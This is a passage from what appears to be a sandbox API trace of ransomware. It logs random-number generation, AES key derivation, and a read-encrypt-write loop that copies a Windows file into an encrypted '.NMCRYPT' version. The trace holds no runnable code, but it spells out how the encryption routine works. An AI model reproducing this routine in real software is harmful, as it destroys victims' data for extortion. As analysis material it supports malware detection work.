out: pbBuffer=0x2d7e150) returned 1 [0155.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.284] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0155.285] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0155.285] CryptCreateHash (in: hProv=0x8e3330, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44483c | out: phHash=0x1d44483c) returned 1 [0155.285] CryptHashData (hHash=0x9ad438, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0155.285] CryptDeriveKey (in: hProv=0x8e3330, Algid=0x6610, hBaseData=0x9ad438, dwFlags=0x4, phKey=0x1d444840 | out: phKey=0x1d444840*=0x9ad278) returned 1 [0155.285] CryptSetKeyParam (hKey=0x9ad278, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0155.285] CryptSetKeyParam (hKey=0x9ad278, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0155.285] wcslen (_String="\\\\?\\") returned 0x4 [0155.285] CryptDuplicateKey (in: hKey=0x9ad278, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad478) returned 1 [0155.285] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main.xml.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0155.286] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0155.286] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=44506) returned 1 [0155.286] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0155.287] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.311] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.311] GetLastError () returned 0x0 [0155.311] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.312] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.312] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.312] GetLastError () returned 0x0 [0155.312] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.312] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.312] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.312] GetLastError () returned 0x0 [0155.312] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.312] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.312] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.312] GetLastError () returned 0x0 [0155.313] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.313] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.313] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.313] GetLastError () returned 0x0 [0155.313] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.313] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.313] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.313] GetLastError () returned 0x0 [0155.313] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.313] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.313] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.313] GetLastError () returned 0x0 [0155.313] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.313] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.313] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.313] GetLastError () returned 0x0 [0155.313] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.313] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.313] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.313] GetLastError () returned 0x0 [0155.313] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.313] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.313] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.313] GetLastError () returned 0x0 [0155.313] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.313] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.314] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.314] GetLastError () returned 0x0 [0155.314] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.314] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.314] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.314] GetLastError () returned 0x0 [0155.314] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.314] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.314] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.314] GetLastError () returned 0x0 [0155.314] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.314] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.314] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.314] GetLastError () returned 0x0 [0155.314] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.314] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.314] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.314] GetLastError () returned 0x0 [0155.314] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.314] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.314] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.314] GetLastError () returned 0x0 [0155.314] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.315] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.333] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.333] GetLastError () returned 0x0 [0155.333] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.333] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.333] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.333] GetLastError () returned 0x0 [0155.333] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.333] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.333] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 